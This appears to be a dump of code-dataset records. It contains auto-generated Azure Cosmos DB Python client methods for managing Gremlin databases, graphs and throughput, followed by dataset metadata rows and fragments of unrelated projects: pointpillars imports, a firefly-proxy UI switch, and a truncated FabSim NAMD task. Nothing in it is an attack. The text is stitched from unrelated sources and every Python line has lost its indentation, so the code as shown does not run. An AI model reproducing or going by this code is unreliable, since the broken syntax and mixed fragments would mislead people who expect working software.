~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_gremlin_database_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_gremlin_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}'}
def get_gremlin_database_throughput(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the Gremlin database under an existing Azure
Cosmos DB database account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_gremlin_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_gremlin_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/settings/throughput'}
def _update_gremlin_database_throughput_initial(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_gremlin_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_gremlin_database_throughput(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update RUs per second of an Azure Cosmos DB Gremlin database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_gremlin_database_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_gremlin_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/settings/throughput'}
def list_gremlin_graphs(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Lists the Gremlin graph under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of GremlinGraph
:rtype:
~azure.mgmt.cosmosdb.models.GremlinGraphPaged[~azure.mgmt.cosmosdb.models.GremlinGraph]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_gremlin_graphs.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.GremlinGraphPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_gremlin_graphs.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs'}
def get_gremlin_graph(
self, resource_group_name, account_name, database_name, graph_name, custom_headers=None, raw=False, **operation_config):
"""Gets the Gremlin graph under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param graph_name: Cosmos DB graph name.
:type graph_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: GremlinGraph or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.GremlinGraph or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_gremlin_graph.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'graphName': self._serialize.url("graph_name", graph_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GremlinGraph', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_gremlin_graph.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs/{graphName}'}
def _create_update_gremlin_graph_initial(
self, resource_group_name, account_name, database_name, graph_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_gremlin_graph_parameters = models.GremlinGraphCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_gremlin_graph.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'graphName': self._serialize.url("graph_name", graph_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_gremlin_graph_parameters, 'GremlinGraphCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GremlinGraph', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_gremlin_graph(
self, resource_group_name, account_name, database_name, graph_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or update an Azure Cosmos DB Gremlin graph.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param graph_name: Cosmos DB graph name.
:type graph_name: str
:param resource: The standard JSON format of a Gremlin graph
:type resource: ~azure.mgmt.cosmosdb.models.GremlinGraphResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns GremlinGraph or
ClientRawResponse<GremlinGraph> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.GremlinGraph]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.GremlinGraph]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_gremlin_graph_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
graph_name=graph_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('GremlinGraph', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_gremlin_graph.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs/{graphName}'}
def _delete_gremlin_graph_initial(
self, resource_group_name, account_name, database_name, graph_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_gremlin_graph.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'graphName': self._serialize.url("graph_name", graph_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_gremlin_graph(
self, resource_group_name, account_name, database_name, graph_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB Gremlin graph.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param graph_name: Cosmos DB graph name.
:type graph_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_gremlin_graph_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
graph_name=graph_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_gremlin_graph.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs/{graphName}'}
def get_gremlin_graph_throughput(
self, resource_group_name, account_name, database_name, graph_name, custom_headers=None, raw=False, **operation_config):
"""Gets the Gremlin graph throughput under an existing Azure Cosmos DB
database account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param graph_name: Cosmos DB graph name.
:type graph_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_gremlin_graph_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'graphName': self._serialize.url("graph_name", graph_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_gremlin_graph_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs/{graphName}/settings/throughput'}
def _update_gremlin_graph_throughput_initial(
self, resource_group_name, account_name, database_name, graph_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_gremlin_graph_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'graphName': self._serialize.url("graph_name", graph_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_gremlin_graph_throughput(
self, resource_group_name, account_name, database_name, graph_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update RUs per second of an Azure Cosmos DB Gremlin graph.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param graph_name: Cosmos DB graph name.
:type graph_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_gremlin_graph_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
graph_name=graph_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_gremlin_graph_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs/{graphName}/settings/throughput'}
| 51.207034 | 279 | 0.678135 | 34,111 | 308,676 | 5.90311 | 0.012078 | 0.033959 | 0.03816 | 0.025745 | 0.970238 | 0.964243 | 0.960395 | 0.958398 | 0.957618 | 0.956188 | 0 | 0.00533 | 0.226266 | 308,676 | 6,027 | 280 | 51.21553 | 0.837774 | 0.245844 | 0 | 0.85009 | 0 | 0.016158 | 0.170024 | 0.094687 | 0 | 0 | 0 | 0 | 0 | 1 | 0.050569 | false | 0 | 0.001795 | 0 | 0.122382 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6ea1236052e14d9533b4e423819544f4d63f0815 | 83 | py | Python | second/data/__init__.py | lpj0822/pointpillars_train | 43594b50fcb5124ab449f1596ab2a9713de18051 | [
"MIT"
] | 1 | 2020-09-05T09:18:53.000Z | 2020-09-05T09:18:53.000Z | second/data/__init__.py | lpj0822/pointpillars_train | 43594b50fcb5124ab449f1596ab2a9713de18051 | [
"MIT"
] | 1 | 2021-04-29T07:04:30.000Z | 2021-04-29T07:04:30.000Z | second/data/__init__.py | lpj0822/pointpillars_train | 43594b50fcb5124ab449f1596ab2a9713de18051 | [
"MIT"
] | 1 | 2020-08-25T09:06:42.000Z | 2020-08-25T09:06:42.000Z | from . import kitti_dataset
from . import nuscenes_dataset
from . import my_dataset | 27.666667 | 30 | 0.831325 | 12 | 83 | 5.5 | 0.5 | 0.454545 | 0.515152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13253 | 83 | 3 | 31 | 27.666667 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6eda2bcfde40b94722296fb6db6ec7e2e4bfa9b8 | 150 | py | Python | DEPRECATED_PYTHON_SRC/component/ui.py | 17701253801/firefly-proxy | 153e0d343d93d68a803bba6b89497f7bc2b96bc8 | [
"BSD-2-Clause"
] | 5,895 | 2015-01-01T14:33:17.000Z | 2022-03-19T03:08:48.000Z | DEPRECATED_PYTHON_SRC/component/ui.py | BIGMONK/firefly-proxy | 60161af7b239ab400d39a23b61ab312f84b94570 | [
"BSD-2-Clause"
] | 626 | 2015-01-07T22:09:26.000Z | 2022-03-24T01:56:50.000Z | DEPRECATED_PYTHON_SRC/component/ui.py | BIGMONK/firefly-proxy | 60161af7b239ab400d39a23b61ab312f84b94570 | [
"BSD-2-Clause"
] | 1,145 | 2015-01-04T06:50:54.000Z | 2022-03-15T13:12:17.000Z | import os
import sys
if os.name == 'nt':
from component._ui_win import UI
elif sys.platform == "darwin":
from component._ui_mac import UI | 21.428571 | 38 | 0.693333 | 24 | 150 | 4.166667 | 0.583333 | 0.26 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.213333 | 150 | 7 | 39 | 21.428571 | 0.847458 | 0 | 0 | 0 | 0 | 0 | 0.05298 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
42c5aace1330e9fda92b0e2322172531b583a6d9 | 13,132 | py | Python | deploy/BioMD/fabBioMD.py | djgroen/FabSim | e26a81342de92ab1a8b7c25b63e2f85c3094fc1d | [
"BSD-3-Clause"
] | 12 | 2015-10-06T08:32:47.000Z | 2021-04-07T03:03:22.000Z | deploy/BioMD/fabBioMD.py | djgroen/FabSim | e26a81342de92ab1a8b7c25b63e2f85c3094fc1d | [
"BSD-3-Clause"
] | null | null | null | deploy/BioMD/fabBioMD.py | djgroen/FabSim | e26a81342de92ab1a8b7c25b63e2f85c3094fc1d | [
"BSD-3-Clause"
] | 5 | 2016-04-30T23:39:17.000Z | 2019-06-06T16:14:30.000Z | # -*- coding: utf-8 -*-
#
# This source file is part of the FabSim software toolkit, which is distributed under the BSD 3-Clause license.
# Please refer to LICENSE for detailed information regarding the licensing.
#
# This file contains FabSim definitions specific to FabBioMD.
from ..fab import *
# Add local script, blackbox and template path.
add_local_paths("BioMD")
@task
def namd(config,**args):
"""Submit a NAMD job to the remote queue.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
